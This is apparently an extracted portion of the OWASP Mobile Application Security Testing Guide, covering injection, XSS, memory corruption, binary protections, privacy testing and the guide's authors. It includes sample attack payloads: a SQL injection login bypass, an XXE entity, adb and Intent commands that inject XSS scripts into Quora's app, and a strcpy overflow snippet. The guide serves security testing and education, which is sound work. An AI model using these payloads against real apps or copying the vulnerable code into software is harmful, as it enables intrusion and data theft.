Vulnerabilities of this class are most prevalent in server-side web services. Exploitable instances also exist within mobile apps, but occurrences are less common, plus the attack surface is smaller.
For example, while an app might query a local SQLite database, such databases usually do not store sensitive data (assuming the developer followed basic security practices). This makes SQL injection a non-viable attack vector. Nevertheless, exploitable injection vulnerabilities sometimes occur, meaning proper input validation is a necessary best practice for programmers.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#sql-injection","title":"SQL Injection","text":"A SQL injection attack involves integrating SQL commands into input data, mimicking the syntax of a predefined SQL command. A successful SQL injection attack allows the attacker to read or write to the database and possibly execute administrative commands, depending on the permissions granted by the server.
Apps on both Android and iOS use SQLite databases as a means to control and organize local data storage. Assume an Android app handles local user authentication by storing the user credentials in a local database (a poor programming practice we\u2019ll overlook for the sake of this example). Upon login, the app queries the database to search for a record with the username and password entered by the user:
SQLiteDatabase db;\n\nString sql = \"SELECT * FROM users WHERE username = '\" + username + \"' AND password = '\" + password +\"'\";\n\nCursor c = db.rawQuery( sql, null );\n\nreturn c.getCount() != 0;\n
Let's further assume an attacker enters the following values into the \"username\" and \"password\" fields:
username = 1' or '1' = '1\npassword = 1' or '1' = '1\n
This results in the following query:
SELECT * FROM users WHERE username='1' OR '1' = '1' AND Password='1' OR '1' = '1'\n
Because the condition '1' = '1'
always evaluates as true, this query returns all records in the database, causing the login function to return true
even though no valid user account was entered.
Ostorlab exploited the sort parameter of Yahoo's weather mobile application with adb using this SQL injection payload.
Another real-world instance of client-side SQL injection was discovered by Mark Woods within the \"Qnotes\" and \"Qget\" Android apps running on QNAP NAS storage appliances. These apps exported content providers vulnerable to SQL injection, allowing an attacker to retrieve the credentials for the NAS device. A detailed description of this issue can be found on the Nettitude Blog.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#xml-injection","title":"XML Injection","text":"In an XML injection attack, the attacker injects XML meta-characters to structurally alter XML content. This can be used either to compromise the logic of an XML-based application or service, or possibly to allow an attacker to exploit the operation of the XML parser processing the content.
A popular variant of this attack is XML eXternal Entity (XXE). Here, an attacker injects an external entity definition containing a URI into the input XML. During parsing, the XML parser expands the attacker-defined entity by accessing the resource specified by the URI. The integrity of the parsing application ultimately determines capabilities afforded to the attacker, where the malicious user could do any (or all) of the following: access local files, trigger HTTP requests to arbitrary hosts and ports, launch a cross-site request forgery (CSRF) attack, and cause a denial-of-service condition. The OWASP web testing guide contains the following example for XXE:
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <!DOCTYPE foo [ \n <!ELEMENT foo ANY >\n <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>\n
In this example, the local file /dev/random
is opened where an endless stream of bytes is returned, potentially causing a denial-of-service.
The current trend in app development focuses mostly on REST/JSON-based services as XML is becoming less common. However, in the rare cases where user-supplied or otherwise untrusted content is used to construct XML queries, it could be interpreted by local XML parsers, such as NSXMLParser on iOS. As such, said input should always be validated and meta-characters should be escaped.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-attack-vectors","title":"Injection Attack Vectors","text":"The attack surface of mobile apps is quite different from typical web and network applications. Mobile apps don't often expose services on the network, and viable attack vectors on an app's user interface are rare. Injection attacks against an app are most likely to occur through inter-process communication (IPC) interfaces, where a malicious app attacks another app running on the device.
Locating a potential vulnerability begins by either:
During a manual security review, you should employ a combination of both techniques. In general, untrusted inputs enter mobile apps through the following channels:
Verify that the following best practices have been followed:
We will cover details related to input sources and potentially vulnerable APIs for each mobile OS in the OS-specific testing guides.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#cross-site-scripting-flaws","title":"Cross-Site Scripting Flaws","text":"Cross-site scripting (XSS) issues allow attackers to inject client-side scripts into web pages viewed by users. This type of vulnerability is prevalent in web applications. When a user views the injected script in a browser, the attacker gains the ability to bypass the same origin policy, enabling a wide variety of exploits (e.g. stealing session cookies, logging key presses, performing arbitrary actions, etc.).
In the context of native apps, XSS risks are far less prevalent for the simple reason these kinds of applications do not rely on a web browser. However, apps using WebView components, such as WKWebView
or the deprecated UIWebView
on iOS and WebView
on Android, are potentially vulnerable to such attacks.
An older but well-known example is the local XSS issue in the Skype app for iOS, first identified by Phil Purviance. The Skype app failed to properly encode the name of the message sender, allowing an attacker to inject malicious JavaScript to be executed when a user views the message. In his proof-of-concept, Phil showed how to exploit the issue and steal a user's address book.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#static-analysis-security-testing-considerations","title":"Static Analysis - Security Testing Considerations","text":"Take a close look at any WebViews present and investigate for untrusted input rendered by the app.
XSS issues may exist if the URL opened by WebView is partially determined by user input. The following example is from an XSS issue in the Zoho Web Service, reported by Linus S\u00e4rud.
Java
webView.loadUrl(\"javascript:initialize(\" + myNumber + \");\");\n
Kotlin
webView.loadUrl(\"javascript:initialize($myNumber);\")\n
Another example of XSS issues determined by user input is public overridden methods.
Java
@Override\npublic boolean shouldOverrideUrlLoading(WebView view, String url) {\n if (url.substring(0,6).equalsIgnoreCase(\"yourscheme:\")) {\n // parse the URL object and execute functions\n }\n}\n
Kotlin
fun shouldOverrideUrlLoading(view: WebView, url: String): Boolean {\n if (url.substring(0, 6).equals(\"yourscheme:\", ignoreCase = true)) {\n // parse the URL object and execute functions\n }\n }\n
Sergey Bobrov was able to take advantage of this in the following HackerOne report. Any input to the HTML parameter would be trusted in Quora's ActionBarContentActivity. Payloads were successful using adb, clipboard data via ModalContentActivity, and Intents from 3rd party applications.
$ adb shell\n$ am start -n com.quora.android/com.quora.android.ActionBarContentActivity \\\n-e url 'http://test/test' -e html 'XSS<script>alert(123)</script>'\n
$ am start -n com.quora.android/com.quora.android.ModalContentActivity \\\n-e url 'http://test/test' -e html \\\n'<script>alert(QuoraAndroid.getClipboardData());</script>'\n
Intent i = new Intent();\ni.setComponent(new ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\"));\ni.putExtra(\"url\",\"http://test/test\");\ni.putExtra(\"html\",\"XSS PoC <script>alert(123)</script>\");\nview.getContext().startActivity(i);\n
val i = Intent()\ni.component = ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\")\ni.putExtra(\"url\", \"http://test/test\")\ni.putExtra(\"html\", \"XSS PoC <script>alert(123)</script>\")\nview.context.startActivity(i)\n
If a WebView is used to display a remote website, the burden of escaping HTML shifts to the server side. If an XSS flaw exists on the web server, this can be used to execute script in the context of the WebView. As such, it is important to perform static analysis of the web application source code.
Verify that the following best practices have been followed:
Consider how data will be rendered in a response. For example, if data is rendered in an HTML context, there are six control characters that must be escaped:
Character Escaped & & < < > > \" " ' ' / /For a comprehensive list of escaping rules and other prevention measures, refer to the OWASP XSS Prevention Cheat Sheet.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations","title":"Dynamic Analysis - Security Testing Considerations","text":"XSS issues can be best detected using manual and/or automated input fuzzing, i.e. injecting HTML tags and special characters into all available input fields to verify the web application denies invalid inputs or escapes the HTML meta-characters in its output.
A reflected XSS attack refers to an exploit where malicious code is injected via a malicious link. To test for these attacks, automated input fuzzing is considered to be an effective method. For example, the BURP Scanner is highly effective in identifying reflected XSS vulnerabilities. As always with automated analysis, ensure all input vectors are covered with a manual review of testing parameters.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Memory corruption bugs are a popular mainstay with hackers. This class of bug results from a programming error that causes the program to access an unintended memory location. Under the right conditions, attackers can capitalize on this behavior to hijack the execution flow of the vulnerable program and execute arbitrary code. This kind of vulnerability occurs in a number of ways:
Buffer overflows: This describes a programming error where an app writes beyond an allocated memory range for a particular operation. An attacker can use this flaw to overwrite important control data located in adjacent memory, such as function pointers. Buffer overflows were formerly the most common type of memory corruption flaw, but have become less prevalent over the years due to a number of factors. Notably, awareness among developers of the risks in using unsafe C library functions is now a common best practice plus, catching buffer overflow bugs is relatively simple. However, it is still worth testing for such defects.
Out-of-bounds-access: Buggy pointer arithmetic may cause a pointer or index to reference a position beyond the bounds of the intended memory structure (e.g. buffer or list). When an app attempts to write to an out-of-bounds address, a crash or unintended behavior occurs. If the attacker can control the target offset and manipulate the content written to some extent, code execution exploit is likely possible.
Dangling pointers: These occur when an object with an incoming reference to a memory location is deleted or deallocated, but the object pointer is not reset. If the program later uses the dangling pointer to call a virtual function of the already deallocated object, it is possible to hijack execution by overwriting the original vtable pointer. Alternatively, it is possible to read or write object variables or other memory structures referenced by a dangling pointer.
Use-after-free: This refers to a special case of dangling pointers referencing released (deallocated) memory. After a memory address is cleared, all pointers referencing the location become invalid, causing the memory manager to return the address to a pool of available memory. When this memory location is eventually re-allocated, accessing the original pointer will read or write the data contained in the newly allocated memory. This usually leads to data corruption and undefined behavior, but crafty attackers can set up the appropriate memory locations to leverage control of the instruction pointer.
Integer overflows: When the result of an arithmetic operation exceeds the maximum value for the integer type defined by the programmer, this results in the value \"wrapping around\" the maximum integer value, inevitably resulting in a small value being stored. Conversely, when the result of an arithmetic operation is smaller than the minimum value of the integer type, an integer underflow occurs where the result is larger than expected. Whether a particular integer overflow/underflow bug is exploitable depends on how the integer is used. For example, if the integer type were to represent the length of a buffer, this could create a buffer overflow vulnerability.
Format string vulnerabilities: When unchecked user input is passed to the format string parameter of the printf
family of C functions, attackers may inject format tokens such as \u2018%c\u2019 and \u2018%n\u2019 to access memory. Format string bugs are convenient to exploit due to their flexibility. Should a program output the result of the string formatting operation, the attacker can read and write to memory arbitrarily, thus bypassing protection features such as ASLR.
The primary goal in exploiting memory corruption is usually to redirect program flow into a location where the attacker has placed assembled machine instructions referred to as shellcode. On iOS, the data execution prevention feature (as the name implies) prevents execution from memory defined as data segments. To bypass this protection, attackers leverage return-oriented programming (ROP). This process involves chaining together small, pre-existing code chunks (\"gadgets\") in the text segment where these gadgets may execute a function useful to the attacker or, call mprotect
to change memory protection settings for the location where the attacker stored the shellcode.
Android apps are, for the most part, implemented in Java which is inherently safe from memory corruption issues by design. However, native apps utilizing JNI libraries are susceptible to this kind of bug. In rare cases, Android apps that use XML/JSON parsers to unwrap Java objects are also subject to memory corruption bugs. An example of such vulnerability was found in the PayPal app.
Similarly, iOS apps can wrap C/C++ calls in Obj-C or Swift, making them susceptible to these kinds of attacks.
Example:
The following code snippet shows a simple example for a condition resulting in a buffer overflow vulnerability.
void copyData(char *userId) { \n char smallBuffer[10]; // size of 10 \n strcpy(smallBuffer, userId);\n } \n
To identify potential buffer overflows, look for uses of unsafe string functions (strcpy
, strcat
, other functions beginning with the \"str\" prefix, etc.) and potentially vulnerable programming constructs, such as copying user input into a limited-size buffer. The following should be considered red flags for unsafe string functions:
strcat
strcpy
strncat
strlcat
strncpy
strlcpy
sprintf
snprintf
gets
Also, look for instances of copy operations implemented as \"for\" or \"while\" loops and verify length checks are performed correctly.
Verify that the following best practices have been followed:
strcpy
, most other functions beginning with the \"str\" prefix, sprint
, vsprintf
, gets
, etc.;memcpy
, make sure you check that the target buffer is at least of equal size as the source and that both buffers are not overlapping.Static code analysis of low-level code is a complex topic that could easily fill its own book. Automated tools such as RATS combined with limited manual inspection efforts are usually sufficient to identify low-hanging fruits. However, memory corruption conditions often stem from complex causes. For example, a use-after-free bug may actually be the result of an intricate, counter-intuitive race condition not immediately apparent. Bugs manifesting from deep instances of overlooked code deficiencies are generally discovered through dynamic analysis or by testers who invest time to gain a deep understanding of the program.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations_1","title":"Dynamic Analysis Security Testing Considerations","text":"Memory corruption bugs are best discovered via input fuzzing: an automated black-box software testing technique in which malformed data is continually sent to an app to survey for potential vulnerability conditions. During this process, the application is monitored for malfunctions and crashes. Should a crash occur, the hope (at least for security testers) is that the conditions creating the crash reveal an exploitable security flaw.
Fuzz testing techniques or scripts (often called \"fuzzers\") will typically generate multiple instances of structured input in a semi-correct fashion. Essentially, the values or arguments generated are at least partially accepted by the target application, yet also contain invalid elements, potentially triggering input processing flaws and unexpected program behaviors. A good fuzzer exposes a substantial amount of possible program execution paths (i.e. high coverage output). Inputs are either generated from scratch (\"generation-based\") or derived from mutating known, valid input data (\"mutation-based\").
For more information on fuzzing, refer to the OWASP Fuzzing Guide.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#binary-protection-mechanisms","title":"Binary Protection Mechanisms","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#position-independent-code","title":"Position Independent Code","text":"PIC (Position Independent Code) is code that, being placed somewhere in the primary memory, executes properly regardless of its absolute address. PIC is commonly used for shared libraries, so that the same library code can be loaded in a location in each program address space where it does not overlap with other memory in use (for example, other shared libraries).
PIE (Position Independent Executable) are executable binaries made entirely from PIC. PIE binaries are used to enable ASLR (Address Space Layout Randomization) which randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-management","title":"Memory Management","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#automatic-reference-counting","title":"Automatic Reference Counting","text":"ARC (Automatic Reference Counting) is a memory management feature of the Clang compiler exclusive to Objective-C and Swift. ARC automatically frees up the memory used by class instances when those instances are no longer needed. ARC differs from tracing garbage collection in that there is no background process that deallocates the objects asynchronously at runtime.
Unlike tracing garbage collection, ARC does not handle reference cycles automatically. This means that as long as there are \"strong\" references to an object, it will not be deallocated. Strong cross-references can accordingly create deadlocks and memory leaks. It is up to the developer to break cycles by using weak references. You can learn more about how it differs from Garbage Collection here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#garbage-collection","title":"Garbage Collection","text":"Garbage Collection (GC) is an automatic memory management feature of some languages such as Java/Kotlin/Dart. The garbage collector attempts to reclaim memory which was allocated by the program, but is no longer referenced\u2014also called garbage. The Android runtime (ART) makes use of an improved version of GC. You can learn more about how it differs from ARC here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#manual-memory-management","title":"Manual Memory Management","text":"Manual memory management is typically required in native libraries written in C/C++ where ARC and GC do not apply. The developer is responsible for doing proper memory management. Manual memory management is known to enable several major classes of bugs into a program when used incorrectly, notably violations of memory safety or memory leaks.
More information can be found in \"Memory Corruption Bugs\".
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#stack-smashing-protection","title":"Stack Smashing Protection","text":"Stack canaries help prevent stack buffer overflow attacks by storing a hidden integer value on the stack right before the return pointer. This value is then validated before the return statement of the function is executed. A buffer overflow attack often overwrites a region of memory in order to overwrite the return pointer and take over the program flow. If stack canaries are enabled, they will be overwritten as well and the CPU will know that the memory has been tampered with.
Stack buffer overflow is a type of the more general programming vulnerability known as buffer overflow (or buffer overrun). Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/","title":"Mobile App User Privacy Protection","text":""},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#overview","title":"Overview","text":"IMPORTANT DISCLAIMER: The MASTG is not a legal handbook and it will not go into the specifics of the GDPR or other possibly relevant legislation here. Instead, this chapter will introduce you to the topics related to user privacy protection, provide you with essential references for your own research efforts, and give you tests or guidelines that determine whether an app adheres to the privacy-related requirements listed in the OWASP MASVS.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-main-problem","title":"The Main Problem","text":"Mobile apps handle all kinds of sensitive user data, from identification and banking information to health data, so both the developers and the public are understandably concerned about how this data is handled and where it ends up. It is also worth discussing the \"benefits users get from using the apps\" vs \"the real price that they are paying for it\" (often without even being aware of it).
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-solution-pre-2020","title":"The Solution (pre-2020)","text":"To ensure that users are properly protected, legislation such as the European Union's General Data Protection Regulation (GDPR) in Europe have been developed and deployed (applicable since May 25, 2018). These laws can force developers to be more transparent regarding the handling of sensitive user data, which is usually implemented with privacy policies.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-challenge","title":"The Challenge","text":"Consider these dimensions of mobile app privacy:
Note: More often than not apps will claim to handle certain data, but in reality that's not the case. The IEEE article \"Engineering Privacy in Smartphone Apps: A Technical Guideline Catalog for App Developers\" by Majid Hatamian gives a very nice introduction to this topic.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#goals-for-data-protection","title":"Goals for Data Protection","text":"When an app requests personal information from a user, the user needs to know why the app needs that data and how it is used by the app. If there is a third party doing the actual processing of the data, the app should tell the user that too.
Like the classic triad of security protection goals: confidentiality, integrity, and availability, there are three protection goals that have been proposed for data protection:
For more details, see Section 5.1.1 \"Introduction to data protection goals\" in ENISA's \"Privacy and data protection in mobile applications\".
Since it is very challenging (if not impossible in many cases) to address both security and privacy protection goals at the same time, it is worth examining a visualization in IEEE's publication Protection Goals for Privacy Engineering called \"The Three Axes\" which helps us understand why we cannot reach 100% of each of all six goals simultaneously.
Though a privacy policy traditionally protects most of these processes, that approach is not always optimal because:
In order to address these challenges and better inform users, Google and Apple have introduced new privacy labeling systems (very much along the lines of NIST's proposal) to help users easily understand how their data is being collected, handled, and shared, Consumer Software Cybersecurity Labeling. Their approaches can be seen at:
Since this is a new requirement on both platforms, these labels must be accurate in order to reassure users and mitigate abuse.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#google-ada-masa-program","title":"Google ADA MASA Program","text":"Since regular security testing helps developers identify key vulnerabilities in their apps, Google Play will allow developers who have completed independent security validation to inform users by disclosing this fact in the app's Data Safety section. The developer's commitment to security and privacy is meant to reassure users.
As part of the process to provide more transparency into the app's security architecture, Google has introduced the MASA (Mobile Application Security Assessment) program as part of the App Defense Alliance (ADA). By bringing MASA, a globally recognized standard for mobile app security, to the mobile app ecosystem, Google is acknowledging the importance of security in this industry. Developers can work directly with an Authorized Lab partner to initiate a security assessment that is independently validated against a set of MASVS Level 1 requirements, and Google will recognize this effort by allowing them to disclose these tests in the app's Data Safety section.
If you are a developer and would like to participate, complete the Independent Security Review form.
Of course the testing is limited and it does not guarantee complete safety of the application. The independent review may not be scoped to verify the accuracy and completeness of a developer's Data Safety declarations, and developers remain solely responsible for making complete and accurate declarations in their app's Play Store listing.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#references","title":"References","text":"You can learn more about this and other privacy related topics here:
Security testers should be aware of Google Play's list of common privacy violations though it is not exhaustive. Some of the examples are below:
You can find more common violations in Google Play Console Help by going to Policy Centre -> Privacy, deception and device abuse -> User data.
As you might expect, these testing categories are related to each other. When you're testing them you're often indirectly testing for user privacy protection. This fact will help you provide better and more comprehensive reports. Often you'll be able to reuse evidence from other tests in order to test for User Privacy Protection.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-disclosure-of-data-privacy-on-the-app-marketplace","title":"Testing Disclosure of Data Privacy on the App Marketplace","text":"This document is only interested in determining which privacy-related information is being disclosed by the developers and discussing how to evaluate this information to decide if it seems reasonable (similarly as you'd do when testing for permissions).
While it is possible that the developers are not declaring certain information that is indeed being collected and\\/or shared, that is a topic for a different test. In this test, you are not supposed to provide privacy violation assurance.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#static-analysis","title":"Static Analysis","text":"To perform a static analysis, follow these steps:
The app passes the test as long as the developer has complied with the app marketplace guidelines and included the required labels and explanations. The developer's disclosures in the app marketpace should be stored as evidence, so that you can later use it to determine potential violations of privacy or data protection.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#dynamic-analysis","title":"Dynamic Analysis","text":"As an optional step, you can also provide some kind of evidence as part of this test. For instance, if you're testing an iOS app you can easily enable app activity recording and export a Privacy Report that contains detailed app access to different resources such as photos, contacts, camera, microphone, network connections, etc.
A dynamic analysis has many advantages for testing other MASVS categories and it provides very useful information that you can use to test network communication for MASVS-NETWORK or when testing app interaction with the platform for MASVS-PLATFORM. While testing these other categories, you might have taken similar measurements using other testing tools. You can also provide this as evidence for this test.
Though the information available should be compared against what the app is actually meant to do, this will be far from a trivial task that could take from several days to weeks to finish depending on your resources and the capabilities of your automated tools. These tests also heavily depend on the app functionality and context and should ideally be performed on a white box setup working very closely with the app developers.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-user-education-on-security-best-practices","title":"Testing User Education on Security Best Practices","text":"Determining whether the app educates users and helps them understand security needs is especially challenging if you intend to automate the process. We recommend using the app extensively and try to answer the following questions whenever applicable:
Fingerprint usage: When fingerprints are used for authentication providing access to high-risk transactions/information,
does the app inform the user about potential issues when having multiple fingerprints of other people registered to the device as well?
Rooting/jailbreaking: When root or jailbreak detection is implemented,
does the app inform the user of the fact that certain high-risk actions will carry additional risk due to the jailbroken/rooted status of the device?
Specific credentials: When a user gets a recovery code, a password, or a pin from the application (or sets one),
does the app instruct the user to never share this with anyone else and that only the app will request it?
Application distribution: In case of a high-risk application and in order to prevent users from downloading compromised versions of the application,
does the app manufacturer properly communicate the official way of distributing the app (e.g. from Google Play or the App Store)?
Prominent Disclosure: In any case,
does the app display prominent disclosure of data access, collection, use, and sharing? e.g. does the app use the App Tracking Transparency Framework to ask for the permission on iOS?
Other references include:
Welcome to the OWASP Mobile Application Security Testing Guide. Feel free to explore the existing content, but do note that it may change at any time. New APIs and best practices are introduced in iOS and Android with every major (and minor) release and also vulnerabilities are found every day.
If you have feedback or suggestions, or want to contribute, create an issue on GitHub or ping us on Slack. See the README for instructions:
https://www.github.com/OWASP/owasp-mastg/
squirrel (noun plural): Any arboreal sciurine rodent of the genus Sciurus, such as S. vulgaris (red squirrel) or S. carolinensis (grey squirrel), having a bushy tail and feeding on nuts, seeds, etc.
On a beautiful summer day, a group of ~7 young men, a woman, and approximately three squirrels met in a Woburn Forest villa during the OWASP Security Summit 2017. So far, nothing unusual. But little did you know, within the next five days, they would redefine not only mobile application security, but the very fundamentals of book writing itself (ironically, the event took place near Bletchley Park, once the residence and work place of the great Alan Turing).
Or maybe that's going too far. But at least, they produced a proof-of-concept for an unusual security book. The Mobile Application Security Testing Guide (MASTG) is an open, agile, crowd-sourced effort, made of the contributions of dozens of authors and reviewers from all over the world.
Because this isn't a normal security book, the introduction doesn't list impressive facts and data proving importance of mobile devices in this day and age. It also doesn't explain how mobile application security is broken, and why a book like this was sorely needed, and the authors don't thank their beloved ones without whom the book wouldn't have been possible.
We do have a message to our readers however! The first rule of the OWASP Mobile Application Security Testing Guide is: Don't just follow the OWASP Mobile Application Security Testing Guide. True excellence at mobile application security requires a deep understanding of mobile operating systems, coding, network security, cryptography, and a whole lot of other things, many of which we can only touch on briefly in this book. Don't stop at security testing. Write your own apps, compile your own kernels, dissect mobile malware, learn how things tick. And as you keep learning new things, consider contributing to the MASTG yourself! Or, as they say: \"Do a pull request\".
"},{"location":"MASTG/Intro/0x02a-Frontispiece/","title":"Frontispiece","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#about-the-owasp-mastg","title":"About the OWASP MASTG","text":"The OWASP Mobile Application Security Testing Guide (MASTG), which is part of the OWASP Mobile Application Security (MAS) flagship project, is a comprehensive manual covering the processes, techniques, and tools used during mobile application security analysis, as well as an exhaustive set of test cases for verifying the requirements listed in the OWASP Mobile Application Security Verification Standard (MASVS), providing a baseline for complete and consistent security tests.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"
Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software such as MS SQL Server, Adobe Flash Player, IBM Director, Cisco VOIP, and ModSecurity. If you can name it, he has probably broken it at least once. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer, which makes him a jack of all trades. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#co-authors","title":"Co-Authors","text":"Co-authors have consistently contributed quality content and have at least 2,000 additions logged in the GitHub repository.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#romuald-szkudlarek","title":"Romuald Szkudlarek","text":"Romuald is a passionate cyber security & privacy professional with over 15 years of experience in the web, mobile, IoT and cloud domains. During his career, he has been dedicating his spare time to a variety of projects with the goal of advancing the sectors of software and security. He is teaching regularly at various institutions. He holds CISSP, CCSP, CSSLP, and CEH credentials.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Although he started his career as a programmer, he found that it was more fun to take things apart than to put things together, and the switch to security was quickly made. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#vikas-gupta","title":"Vikas Gupta","text":"Vikas is an experienced cyber security researcher, with expertise in mobile security. In his career he has worked to secure applications for various industries including fintech, banks and governments. He enjoys reverse engineering, especially obfuscated native code and cryptography. He holds a master's degree in security and mobile computing, and an OSCP certification. He is always open to share his knowledge and exchange ideas.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASTG GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-mastg/releases
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#disclaimer","title":"Disclaimer","text":"Please consult the laws in your country before executing any tests against mobile apps by utilizing the MASTG materials. Refrain from violating the laws with anything described in the MASTG.
Our Code of Conduct has further details: https://github.com/OWASP/owasp-mastg/blob/master/CODE_OF_CONDUCT.md
OWASP thanks the many authors, reviewers, and editors for their hard work in developing this guide. If you have any comments or suggestions, please connect with us: https://mas.owasp.org/contact
If you find any inconsistencies or typos please open an issue in the OWASP MASTG Github Repo: https://github.com/OWASP/owasp-mastg
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/","title":"OWASP MASVS and MASTG Adoption","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#mobile-platform-providers","title":"Mobile Platform Providers","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#google-android","title":"Google Android","text":"Since 2021 Google has shown their support for the OWASP Mobile Security project (MASTG/MASVS) and has started providing continuous and high value feedback to the MASVS refactoring process via the App Defense Alliance (ADA) and its MASA (Mobile Application Security Assessment) program.
With MASA, Google has acknowledged the importance of leveraging a globally recognized standard for mobile app security to the mobile app ecosystem. Developers can work directly with an Authorized Lab partner to initiate a security assessment. Google will recognize developers who have had their applications independently validated against a set of MASVS Level 1 requirements and will showcase this on their Data safety section.
We thank Google, the ADA and all its members for their support and for their excellent work on protecting the mobile app ecosystem.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#certification-institutions","title":"Certification Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#crest","title":"CREST","text":"CREST is an international not-for-profit, membership body who quality assures its members and delivers professional certifications to the cyber security industry. CREST works with governments, regulators, academe, training partners, professional bodies and other stakeholders around the world.
In August 2022, CREST launched the OWASP Verification Standard (OVS) Programme. CREST OVS sets new standards for application security. Underpinned by OWASP's Application Security Verification Standard (ASVS) and Mobile Application Security Verification Standard (MASVS), CREST is leveraging the open-source community to build and maintain global standards to deliver a global web and mobile application security framework. This will provide assurance to the buying community that developers using CREST OVS accredited providers, always know that they are engaged with ethical and capable organisations with skilled and competent security testers by leveraging the OWASP ASVS and MASVS standards.
We thank CREST for their consultation regarding the OVS programme and their support to the open-source community to build and maintain global cyber security standards.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#standardization-institutions","title":"Standardization Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#nist-national-institute-of-standards-and-technology-united-states","title":"NIST (National Institute of Standards and Technology, United States)","text":"The National Institute of Standards and Technology (NIST) was founded in 1901 and is now part of the U.S. Department of Commerce. NIST is one of the nation's oldest physical science laboratories. Congress established the agency to remove a major challenge to U.S. industrial competitiveness at the time \u2014 a second-rate measurement infrastructure that lagged behind the capabilities of the United Kingdom, Germany and other economic rivals.
BSI stands for \"Federal Office for Information Security\", it has the goal to promote IT security in Germany and is the central IT security service provider for the federal government.
